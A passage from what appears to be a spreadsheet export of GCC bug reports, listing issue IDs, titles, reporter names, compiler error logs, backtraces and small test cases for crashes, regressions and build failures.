COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/:/lib/../lib/:/usr/lib/../lib/:/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'test' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.4.5/collect2 --build-id --eh-frame-hdr -m elf_x86_64 --hash-style=both -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o test /usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crt1.o /usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crti.o /usr/lib/gcc/x86_64-linux-gnu/4.4.5/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/4.4.5 -L/usr/lib/gcc/x86_64-linux-gnu/4.4.5 -L/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../.. test.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/4.4.5/crtend.o /usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../lib/crtn.o</t>
  </si>
  <si>
    <t>dave.pagan</t>
  </si>
  <si>
    <t>GCC-50336</t>
  </si>
  <si>
    <t>LWG issue 445</t>
  </si>
  <si>
    <t>C++11 standard:
template &gt;
class istreambuf_iterator
: public iterator&lt;input_iterator_tag charT
typename traits::off_type unspecified  charT&gt;
C++98 and libstdc++:
  template
    class istreambuf_iterator
    : public iterator&lt;input_iterator_tag _CharT typename _Traits::off_type
                      _CharT* _CharT&amp;&gt;
The final '&amp;' should be dropped in C++11 mode. It was noticed by a boost user trying to use zip_iterator.</t>
  </si>
  <si>
    <t>GCC-69973</t>
  </si>
  <si>
    <t>ICE on excessive attribute vector_size</t>
  </si>
  <si>
    <t>Attribute vector_size with a size of 1 &lt;&lt; 29 or greater causes an ICE in all tested versions of GCC all the way back to 4.5 on powerpc64le as well as x86_64.
$ cat t.c &amp;&amp; /build/gcc-trunk/gcc/xgcc -B /build/gcc-trunk/gcc -S -Wall -Wextra -Wpedantic -o/dev/null -xc t.c
typedef int v4si __attribute__ ((vector_size (1 &lt;&lt; 29)))
t.c:1:1: internal compiler error: in layout_type at stor-layout.c:2209
 typedef int v4si __attribute__ ((vector_size (1 &lt;&lt; 29)))
 ^~~~~~~
0x10d0fe37 layout_type(tree_node*)
	/src/gcc/trunk/gcc/stor-layout.c:2208
0x111dc6cb make_vector_type
	/src/gcc/trunk/gcc/tree.c:9890
0x111e0e9b build_vector_type(tree_node* int)
	/src/gcc/trunk/gcc/tree.c:10703
0x10443b37 handle_vector_size_attribute
	/src/gcc/trunk/gcc/c-family/c-common.c:9013
0x102fccaf decl_attributes(tree_node** tree_node* int)
	/src/gcc/trunk/gcc/attribs.c:551
0x10315d2b c_decl_attributes
	/src/gcc/trunk/gcc/c/c-decl.c:4413
0x1031648b start_decl(c_declarator* c_declspecs* bool tree_node*)
	/src/gcc/trunk/gcc/c/c-decl.c:4551
0x103a10a3 c_parser_declaration_or_fndef
	/src/gcc/trunk/gcc/c/c-parser.c:1965
0x1039fedf c_parser_external_declaration
	/src/gcc/trunk/gcc/c/c-parser.c:1551
0x1039f897 c_parser_translation_unit
	/src/gcc/trunk/gcc/c/c-parser.c:1429
0x103db91b c_parse_file()
	/src/gcc/trunk/gcc/c/c-parser.c:17843
0x10481e0b c_common_parse_file()
	/src/gcc/trunk/gcc/c-family/c-opts.c:1064
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-36753</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] Forward propagation interacts badly with global register variable</t>
  </si>
  <si>
    <t>The attached test case is supposed to print '31337' when run.
Correct output:
[slava@imac factor]$ gcc -O1 testcase.c
[slava@imac factor]$ ./a.out
31337
Correct output:
[slava@imac factor]$ gcc -O2 -fno-forward-propagate testcase.c
[slava@imac factor]$ ./a.out
31337
*Incorrect* output:
[slava@imac factor]$ gcc -O2 testcase.c
[slava@imac factor]$ ./a.out
0
We can plainly see the problem in the disassemble for the broken() function. With -O2 -fno-forward-propagate
broken:
        leaq    8(%r14) %rax
        movq    %rax %r14
        movq    $31337 (%rax)
        ret
With -O2:
broken:
        addq    $8 %r14
        movq    $31337 8(%r14)
        ret
===========================================
#include 
#include 
register unsigned long *ds asm(r14)
__attribute__((noinline)) void broken(bool value)
{
        *++ds = 31337
}
int main()
{
        unsigned long stack[2]
        stack[0] = 0
        stack[1] = 0
        ds = stack
        broken(true)
        printf(%ld\n*ds)
}
===========================================</t>
  </si>
  <si>
    <t>GCC-69446</t>
  </si>
  <si>
    <t>[6 Regression] cow-stdexcept.cc:374:1: error: alias d efinitions not supported in this configuration</t>
  </si>
  <si>
    <t>libtool: compile:  /test/gnu/gcc/objdir/./gcc/xgcc -shared-libgcc -B/test/gnu/gcc/objdir/./gcc -nostdinc++ -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/libsupc++/.libs -B/opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux
11.11/lib/ -isystem /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/sys-include -I/test/gnu/gcc/gcc/libst
dc++-v3/../libgcc -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/incl
ude/hppa2.0w-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++
-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -std=gnu++11 -D_GLIBCXX_S
HARED -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi -fdiagnostics-show-location=once -frandom-seed=cow-stdexcept.lo -g -O2 -c ../../..
/../../gcc/libstdc++-v3/src/c++11/cow-stdexcept.cc  -fPIC -DPIC -D_GLIBCXX_SHARE
D -o cow-stdexcept.o
../../../../../gcc/libstdc++-v3/src/c++11/cow-stdexcept.cc:374:1: error: alias d
efinitions not supported in this configuration _ZGTtNSt##NAME##C2EPKc (CLASS* const char*)    \
 ^
../../../../../gcc/libstdc++-v3/src/c++11/cow-stdexcept.cc:408:1: note: in expansion of macro 'CTORDTOR'
 CTORDTOR(11logic_error std::logic_error logic_error)
 ^~~~~~~~
../../../../../gcc/libstdc++-v3/src/c++11/cow-stdexcept.cc:387:1: error: alias definitions not supported in this configuration
 _ZGTtNSt##NAME##C2ERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE( \
 ^
../../../../../gcc/libstdc++-v3/src/c++11/cow-stdexcept.cc:408:1: note: in expansion of macro 'CTORDTOR'
 CTORDTOR(11logic_error std::logic_error logic_error)
 ^~~~~~~~
...</t>
  </si>
  <si>
    <t>GCC-46034</t>
  </si>
  <si>
    <t>[4.6 regression] internal compiler error: segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 22052
a reduced testcase
This is a delta-reduced testcase original has no warnings.
$ gcc-trunk -c -O2 tc.i
tc.i:208:1: warning: data definition has no type or storage class [enabled by default]
tc.i:296:5: warning: data definition has no type or storage class [enabled by default]
tc.i:441:5: warning: data definition has no type or storage class [enabled by default]
tc.i:465:1: warning: data definition has no type or storage class [enabled by default]
tc.i:539:1: warning: data definition has no type or storage class [enabled by default]
tc.i:541:1: warning: data definition has no type or storage class [enabled by default]
tc.i:543:1: warning: data definition has no type or storage class [enabled by default]
tc.i:545:1: warning: data definition has no type or storage class [enabled by default]
tc.i:680:3: warning: data definition has no type or storage class [enabled by default]
tc.i: In function â€˜add_y_curve_partâ€™:
tc.i:837:24: warning: initialization makes pointer from integer without a cast [enabled by default]
tc.i: In function â€˜add_y_line_auxâ€™:
tc.i:925:24: warning: initialization makes pointer from integer without a cast [enabled by default]
gcc-trunk: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>moonshine</t>
  </si>
  <si>
    <t>GCC-6502</t>
  </si>
  <si>
    <t>gcj crashes when compiling a jar</t>
  </si>
  <si>
    <t>Gcj crashes when compiling a jar file to native code.
gcj -fjni jhdf.jar
produces:
ncsa/hdf/hdflib/HDFDeprecated.java: In class `ncsa.hdf.hdflib.HDFDeprecated':
ncsa/hdf/hdflib/HDFDeprecated.java: In method `ncsa.hdf.hdflib.HDFDeprecated.DFSDsetcal(doubledoubledoubledoubleint)':
ncsa/hdf/hdflib/HDFDeprecated.java:479: Internal compiler error in start_java_method at java/decl.c:1782
Please submit a full bug report
Release:
gcc version 3.0.4
Environment:
Linux debian 2.4.18 #2 Sun Mar 17 11:12:01 PST 2002 i686 unknown
How-To-Repeat:
gcj -fjni jhdf.jar
Extracting the java archive and then compiling the classes to object code produces the same error.
Ex. gcj -fjni HDFLibrary.class -I../../../
produces
ncsa/hdf/hdflib/HDFLibrary.java: In class `ncsa.hdf.hdflib.HDFLibrary':
ncsa/hdf/hdflib/HDFLibrary.java: In method `ncsa.hdf.hdflib.HDFLibrary.SDsetcal(intdoubledoubledoubledoubleint)':
ncsa/hdf/hdflib/HDFLibrary.java:1620: Internal compiler error in start_java_method at java/decl.c:1782
Code was compiled by IBM-JDK 1.3</t>
  </si>
  <si>
    <t>plasmoid</t>
  </si>
  <si>
    <t>GCC-5767</t>
  </si>
  <si>
    <t>ICE with forwarding template template parameters</t>
  </si>
  <si>
    <t xml:space="preserve">	
g++ crashes for this example of forwarding template template parameters.
`A::template Template' is what I would expect but gives a parse error.
% g++ bug.cc
bug.cc: In function `int main()':
bug.cc:29: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.4
Environment:
System: OSF1 u51.num.math.uni-goettingen.de V4.0 1229 alpha
Machine: alpha
host: alphaev67-dec-osf4.0f
build: alphaev67-dec-osf4.0f
target: alphaev67-dec-osf4.0f
configured with: /tmp_mnt/home/cfd1/home/cfd/gcc-3.0.4/configure --prefix=/home/cfd1/usr --exec-prefix=/home/cfd1/usr/alphaev67-dec-osf4.0f --srcdir=/tmp_mnt/home/cfd1/home/cfd/gcc-3.0.4 --enable-static --enable-shared --disable-nls --without-gnu-as --without-gnu-ld --enable-languages=c++ --enable-cpp --enable-multilib --disable-threads --disable-libgcj --disable-target-optspace --with-stabs --without-dwarf2
How-To-Repeat:
template  class TP&gt;
struct A
{
    template 
    struct Template
    {
	typedef typename TP::Type Type
    }
}
template  class TP&gt;
struct B
{
    template 
    struct Template
    {
	// Using `template' qualifier before first `Template' gives parse error
	typedef typename A::Template&gt;::template Template::Type Type
    }
}
template 
struct C
{
    typedef void Type
}
int main()
{
    typedef B::Template::Type Type
}</t>
  </si>
  <si>
    <t>priesnit</t>
  </si>
  <si>
    <t>GCC-51916</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/lto/trans-mem-3 c_lto_trans-mem-3_0.o-c_lto_trans-mem-3_1.o link -flto (internal compiler error)</t>
  </si>
  <si>
    <t>The test for gcc.dg/lto/trans-mem-3* fails on *-apple-darwin*  as
[macbook] f90/bug% gcc47 /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-3_0.c -c -o obj_0.o -flto
[macbook] f90/bug% gcc47 /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c -c -o obj_1.o -flto -fgnu-tm
[macbook] f90/bug% gcc47 obj_0.o obj_1.o -flto
lto1: internal compiler error: in streamer_get_builtin_tree at tree-streamer-in.c:1077
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: gcc47 returned 1 exit status
collect2: error: lto-wrapper returned 1 exit status
The internal compiler error disappears if I add -fgnu-tm:
[macbook] f90/bug% gcc47 obj_0.o obj_1.o -flto -fgnu-tm
[macbook] f90/bug%</t>
  </si>
  <si>
    <t>GCC-11313</t>
  </si>
  <si>
    <t>#pragma weak and static inline functions</t>
  </si>
  <si>
    <t>When bootstrapping with pthread support the compiler complains that 
pthread_create() must be public in order to be declared as a weak symbol using 
#pragma weak. The problem is that the sys/pthread.h that comes with HPUX11.00 
has the following code in it:
	static int pthread_create( 
				  pthread_t *tid 
				  const pthread_attr_t *attr
                                  void *(*start_routine)(void *) 
				  void *arg)
	    { return(__pthread_create_system(tid attr start_routine arg)) }
This function just redirects to the real pthread creation function.
Removing the static modifier gets rid of the visibility error but then the 
compiler complains that the weak declaration must precede the function 
definition.
Hack: I commented out the #pragma weak line for pthread_create() in 
gthr-posix.h but I'm not sure what the consequences of this are.
I'm kind of missing the point of these pragmas. Are they there so gcc 
configured for pthread support will bootstrap whether or not the host actually 
has pthread support?</t>
  </si>
  <si>
    <t>georgaj</t>
  </si>
  <si>
    <t>GCC-71443</t>
  </si>
  <si>
    <t>[7 regression] test case gcc.dg/plugin/must-tail-call-2.c reports error</t>
  </si>
  <si>
    <t>There are 2 new failures in the tail-call-2.c test on recent trunk builds:
FAIL: gcc.dg/plugin/must-tail-call-2.c -fplugin=./must_tail_call_plugin.so  (test for errors line 32)
FAIL: gcc.dg/plugin/must-tail-call-2.c -fplugin=./must_tail_call_plugin.so (test for excess errors)
The error reported is:
/home/wdijkstr/gcc/gcc/testsuite/gcc.dg/plugin/must-tail-call-2.c: In function 'test_2_caller':^M
/home/wdijkstr/gcc/gcc/testsuite/gcc.dg/plugin/must-tail-call-2.c:32:10: error: cannot tail-call: argument must be passed by copying^M
The argument is a large structure which is passed by reference on AArch64. So it looks like the test needs to allow for this possibility. This appears related to PR71293 for Power.</t>
  </si>
  <si>
    <t>GCC-18023</t>
  </si>
  <si>
    <t>ice on trying to convert between int and float</t>
  </si>
  <si>
    <t>irun/bin/gfortran -static test2.f90
test2.f90: In function 'MAIN__':
test2.f90:6: internal compiler error: in gfc_conv_string_parameter at
fortran/trans-expr.c:1986
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
for the program:
program test_bug2
implicit none
real :: toto
toto = 2
print toto
end program test_bug2
I think that a syntax error will be better :)</t>
  </si>
  <si>
    <t>GCC-40608</t>
  </si>
  <si>
    <t>[4.5 Regression] Ada build fails</t>
  </si>
  <si>
    <t>/opt/gnu/gcc/gcc-4.5.0/i686-apple-darwin9/include -isystem /opt/gnu/gcc/gcc-4.5.
0/i686-apple-darwin9/sys-include    -c  -g -O2 -fomit-frame-pointer -DIN_GCC   -
W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes  -W
missing-format-attribute -Wno-long-long -Wno-variadic-macros -Wno-overlength-str
ings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H  \
                 -I. -Iada -I../../gcc/gcc -I../../gcc/gcc/ada -I../../gcc/gcc/.
./include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I.
./../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -Iada -I../../gcc/gcc 
-I../../gcc/gcc/ada -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include
  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libde
cnumber   ../../gcc/gcc/ada/init.c -o ada/init.o
...
cc1: warnings being treated as errors
../../gcc/gcc/ada/init.c: In function '__gnat_is_stack_guard':
../../gcc/gcc/ada/init.c:2130:3: error: implicit declaration of function 'mach_t
ask_self'
../../gcc/gcc/ada/init.c: In function '__gnat_error_handler':
../../gcc/gcc/ada/init.c:2141:55: error: unused parameter 'uc'</t>
  </si>
  <si>
    <t>GCC-64325</t>
  </si>
  <si>
    <t>[5 Regression] ICE: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 34288
testcase
On ppc64 I get:
trippels@gcc2-power8 tools % g++ -c -O2 -std=c++11 regression_word_count.ii
regression_word_count.ii:183:55: internal compiler error: Segmentation fault
 int main () { word_count_grammar g (main_word_count) }
                                                       ^
0x109d39eb crash_signal
        ../../gcc/gcc/toplev.c:358
0x1051bbb0 symtab_node::get_alias_target()
        ../../gcc/gcc/cgraph.h:2250
0x1051bbb0 symtab_node::verify_base()
        ../../gcc/gcc/symtab.c:1123
0x10528883 cgraph_node::verify_node()
        ../../gcc/gcc/cgraph.c:2747
0x1051c0a7 symtab_node::verify()
        ../../gcc/gcc/symtab.c:1154
0x1051c6f7 symtab_node::verify_symtab_nodes()
        ../../gcc/gcc/symtab.c:1174
0x107e0fc7 symbol_table::remove_unreachable_nodes(_IO_FILE*)
        ../../gcc/gcc/ipa.c:655
0x1101fe97 ipa_inline
        ../../gcc/gcc/ipa-inline.c:2196
0x1101fe97 execute
        ../../gcc/gcc/ipa-inline.c:2562
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
This issue might be related to PR64068.</t>
  </si>
  <si>
    <t>GCC-45321</t>
  </si>
  <si>
    <t>[4.6 regression] ARM bootstrap failure due to stdarg_p change</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.6-20100814 (r163252) on arm-linux-gnueabi fails due to a warning in stage2 and the default use of -Werror there:
/home/mikpe/gcc-4.6-20100814/gcc/config/arm/arm.c: In function 'arm_get_pcs_model':
/home/mikpe/gcc-4.6-20100814/gcc/config/arm/arm.c:3720:7: error: passing argument 1 of 'stdarg_p' discards 'const' qualifier from pointer target type [-Werror]
/home/mikpe/gcc-4.6-20100814/gcc/tree.h:4829:13: note: expected 'tree' but argument is of type 'const_tree'
cc1: all warnings being treated as errors
make[3]: *** [arm.o] Error 1
make[3]: Leaving directory `/home/mikpe/objdir46/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/home/mikpe/objdir46'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/home/mikpe/objdir46'
make: *** [bootstrap] Error 2
Presumably caused by r163033:
http://gcc.gnu.org/ml/gcc-cvs/2010-08/msg00244.html</t>
  </si>
  <si>
    <t>GCC-39004</t>
  </si>
  <si>
    <t>Revision 143730 breaks LTO</t>
  </si>
  <si>
    <t>I got
cc1: warnings being treated as errors
../../src-lto/gcc/lto-function-in.c: In function Ã¢input_local_var_declÃ¢:
../../src-lto/gcc/lto-function-in.c:1135: error: unused variable Ã¢context_tagÃ¢
../../src-lto/gcc/lto-function-in.c:1134: error: unused variable Ã¢contextÃ¢
make[5]: *** [lto-function-in.o] Error 1</t>
  </si>
  <si>
    <t>GCC-10593</t>
  </si>
  <si>
    <t>-O2 dead-code optimization removes the wrong code</t>
  </si>
  <si>
    <t xml:space="preserve">From: Brian Kuschak 
To: gcc-gnats@gcc.gnu.org nobody@gcc.gnu.org
Cc:  
Subject: Re: optimization/10593: -O2 dead-code optimization removes the wrong code
Date: Thu 1 May 2003 17:38:10 -0700 (PDT)
 Did you read the 'Fix' field? 
 --- gcc-gnats@gcc.gnu.org wrote:
 &gt; Thank you very much for your problem report.
 &gt; It has the internal identification
 &gt; `optimization/10593'.
 &gt; The individual assigned to look at your
 &gt; report is: unassigned. 
 &gt; 
 &gt; &gt;Category:       optimization
 &gt; &gt;Responsible:    unassigned
 &gt; &gt;Synopsis:       -O2 dead-code optimization removes
 &gt; the wrong code
 &gt; &gt;Arrival-Date:   Fri May 02 00:26:00 UTC 2003
 __________________________________
 Do you Yahoo!?
 The New Yahoo! Search - Faster. Easier. Bingo.
 http://search.yahoo.com
</t>
  </si>
  <si>
    <t>bkuschak</t>
  </si>
  <si>
    <t>GCC-10692</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 regression] [m68k] miscompilation of perl with -O2 -fPIC</t>
  </si>
  <si>
    <t>The attached code wrongly compiles with -O2 -fPIC. Either omitting -fPIC or adding -fno-regmove correctly compiles the code.
regression from 2.95 checked with 3.0.4 3.2.3 3.3 and HEAD.
$ gcc-3.2 -O2 -fPIC bug-187564.i &amp;&amp; ./a.out
Wed loadarchive.c 05 00:00:00 2061 -23683
$ gcc-3.2 -O2 -fPIC -fno-regmove bug-187564.i &amp;&amp; ./a.out
Wed Feb 28 00:00:00 1996 059
$ gcc-3.2 -O2 bug-187564.i &amp;&amp; ./a.out
Wed Feb 28 00:00:00 1996 059
Release:
3.0/3.2/3.3/3.4
Environment:
m68k-linux Debian</t>
  </si>
  <si>
    <t>187564</t>
  </si>
  <si>
    <t>GCC-40439</t>
  </si>
  <si>
    <t>[4.5 Regression] Bootstrap broken on FreeBSD in tree.c</t>
  </si>
  <si>
    <t>/usr/home/kargl/gcc/obj4x/./prev-gcc/xgcc -B/usr/home/kargl/gcc/obj4x/./prev-gcc/ -B/usr/home/kargl/work/i386-unknown-freebsd8.0/bin/ -B/usr/home/kargl/work/i386-unknown-freebsd8.0/bin/ -B/usr/home/kargl/work/i386-unknown-freebsd8.0/lib/ -isystem /usr/home/kargl/work/i386-unknown-freebsd8.0/include -isystem /usr/home/kargl/work/i386-unknown-freebsd8.0/sys-include    -c  -g -O2 -fomit-frame-pointer -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc4x/gcc -I../../gcc4x/gcc/. -I../../gcc4x/gcc/../include -I./../intl -I../../gcc4x/gcc/../libcpp/include -I/usr/local/include  -I../../gcc4x/gcc/../libdecnumber -I../../gcc4x/gcc/../libdecnumber/dpd -I../libdecnumber    ../../gcc4x/gcc/tree.c -o tree.o
cc1: warnings being treated as errors
../../gcc4x/gcc/tree.c: In function 'widest_int_cst_value':
../../gcc4x/gcc/tree.c:8502:10: error: left shift count &gt;= width of type
gmake[3]: *** [tree.o] Error 1
gmake[3]: *** Waiting for unfinished jobs....
rm cpp.pod fsf-funding.pod gfdl.pod gcc.pod gfortran.pod gcov.pod
gmake[3]: Leaving directory `/usr/home/kargl/gcc/obj4x/gcc'
gmake[2]: *** [all-stage2-gcc] Error 2
gmake[2]: Leaving directory `/usr/home/kargl/gcc/obj4x'
gmake[1]: *** [stage2-bubble] Error 2
gmake[1]: Leaving directory `/usr/home/kargl/gcc/obj4x'
gmake: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-43715</t>
  </si>
  <si>
    <t>configure option --enable-plugin fails on darwin</t>
  </si>
  <si>
    <t>Currently configure in gcc 4.5.0 doesn't understand darwin's method of loading shared library modules when the --enable-plugin option is invoked and fails as...
Links are now set up to build a native compiler for x86_64-apple-darwin10.3.0.
checking for exported symbols... /sw/src/fink.build/gcc45-4.5.0-0rc1/gcc-4.5-20100408/gcc/configure: line 25167: -T: command not found
checking for -rdynamic... /sw/src/fink.build/gcc45-4.5.0-0rc1/gcc-4.5-20100408/gcc/configure: line 25173: -T: command not found
checking for library containing dlopen... none required
checking for -fPIC -shared... no
configure: error: 
Building GCC with plugin support requires a host that supports
-fPIC -shared -ldl and -rdynamic.
make[2]: *** [configure-stage1-gcc] Error 1
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
This is preventing the dragon-egg developers from testing their code on darwin.</t>
  </si>
  <si>
    <t>GCC-21594</t>
  </si>
  <si>
    <t>[4.0 only] FAIL: gfortran.dg/eoshift.f90  -O0  execution test</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc-3.3/objdir/gcc/testsuite/../gfortran -B/mnt/gnu/
gcc-3.3/objdir/gcc/testsuite/../ /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gfortran.dg/
eoshift.f90   -O0   -pedantic-errors  -L/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux
11.11/./libgfortran/.libs -L/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./libi
berty  -lm   -o ./eoshift.exe    (timeout = 300)
PASS: gfortran.dg/eoshift.f90  -O0  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./lib
gfortran/.libs:/mnt/gnu/gcc-3.3/objdir/gcc:.:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp
-hpux11.11/./libgfortran/.libs:/mnt/gnu/gcc-3.3/objdir/gcc
FAIL: gfortran.dg/eoshift.f90  -O0  execution test
Test only fails at -O0.</t>
  </si>
  <si>
    <t>GCC-70031</t>
  </si>
  <si>
    <t>Error in recursive module subroutine declaration if declared as module recursive</t>
  </si>
  <si>
    <t>As reported by  on 
This works:
module test
  Interface
    Recursive Module Subroutine sub1 (x)
      Integer Intent (InOut) :: x
    End Subroutine sub1
  End Interface
end module test
submodule(test) testson
  integer :: n = 10
contains
  Module Procedure sub1
    If (x &lt; n) Then
        x = x + 1
        Print * 'x = ' x
        Call sub1 (x)
    End If
  End Procedure sub1
end submodule testson
  use test
  integer :: x = 5
  call sub1(x)
end
but inverting the order in the interface declaration to read
  Module Recursive Subroutine sub1 (x)
causes the error
../submodule.f90:3:4:
     module Recursive Subroutine sub1 (x)
    1
Error: Unclassifiable statement at (1)</t>
  </si>
  <si>
    <t>GCC-83975</t>
  </si>
  <si>
    <t>[8 Regression] ICE in set_parm_default_def_partition at tree-ssa-coalesce.c:1919</t>
  </si>
  <si>
    <t>Changed between 20171217 and 20180107 :
$ cat z1.f90
subroutine s(x)
   character(*) :: x
   associate (y =&gt; x)
   end associate
end
$ gfortran-8-20171217 -c z1.f90
$
$ gfortran-8-20180121 -c z1.f90
during RTL pass: expand
z1.f90:1:0:
 subroutine s(x)
internal compiler error: in set_parm_default_def_partition at tree-ssa-coalesce.c:1919
0xc72efc set_parm_default_def_partition
        ../../gcc/tree-ssa-coalesce.c:1919
0xc72e07 for_all_parms
        ../../gcc/tree-ssa-coalesce.c:1023
0xc74798 get_parm_default_def_partitions(_var_map*)
        ../../gcc/tree-ssa-coalesce.c:1936
0xc2099b remove_ssa_form
        ../../gcc/tree-outof-ssa.c:971
0xc2099b rewrite_out_of_ssa(ssaexpand*)
        ../../gcc/tree-outof-ssa.c:1174
0x805810 execute
        ../../gcc/cfgexpand.c:6218</t>
  </si>
  <si>
    <t>GCC-49255</t>
  </si>
  <si>
    <t>-fcheck=pointer diagnoses too much: Passing NULL pointer to OPTIONAL argument</t>
  </si>
  <si>
    <t>Valid F2008 test case:
integerpointer :: ptr =&gt; null()
call foo(ptr)
contains
  subroutine foo (x)
    integer optional :: x
    print * present (x)
  end subroutine foo
end
But with -fcheck=pointer gfortran prints at run time:
At line 2 of file test.f90
Fortran runtime error: Pointer actual argument 'ptr' is not associated
--- a/gcc/fortran/trans-expr.c
+++ b/gcc/fortran/trans-expr.c
@@ -326913 +326916 @@ gfc_conv_procedure_call (gfc_se * se gfc_symbol * sym
          else
            goto end_pointer_check
-          if (attr.optional)
+          if (attr.optional
+             &amp;&amp; ((gfc_option.allow_std &amp; GFC_STD_F2008) == 0
+                 || attr.proc_pointer))
            {
               /* If the actual argument is an optional pointer/allocatable and
                 the formal argument takes an nonpointer optional value
                 it is invalid to pass a non-present argument on even
                 though there is no technical reason for this in gfortran.
-                See Fortran 2003 Section 12.4.1.6 item (7)+(8).  */
+                See Fortran 2003 Section 12.4.1.6 item (7)+(8).
+                In Fortran 2008 that's allowed cf. 12.5.2.12.  */
              tree present null_ptr type
              if (attr.allocatable</t>
  </si>
  <si>
    <t>GCC-22361</t>
  </si>
  <si>
    <t>Fails to identify</t>
  </si>
  <si>
    <t>template class TP1 {}
template class A&gt;
struct B {
    template struct TP2 : public A {}
    }
template class TP3 typename T&gt;
void    F(const TP3&amp;) {}
int main() {
    B::TP2 b
    F(b)
    }
gets you:
~/ootbc/members/src$ c++ foo.cc
foo.cc: In function `int main()':
foo.cc:13: error: no matching function for call to `F(B::TP2&amp;)'
Note that simplifying to :
struct B {
    template class TP2 {}
    }
template class TP3 typename T&gt;
void    F(const TP3&amp;) {}
int main() {
    B::TP2 b
    F(b)
    }
does work OK.
Ivan</t>
  </si>
  <si>
    <t>GCC-77993</t>
  </si>
  <si>
    <t>[7 regression] bootstrap failure on PowerPC/Linux</t>
  </si>
  <si>
    <t>Bootstrap is broken on PowerPC/Linux:
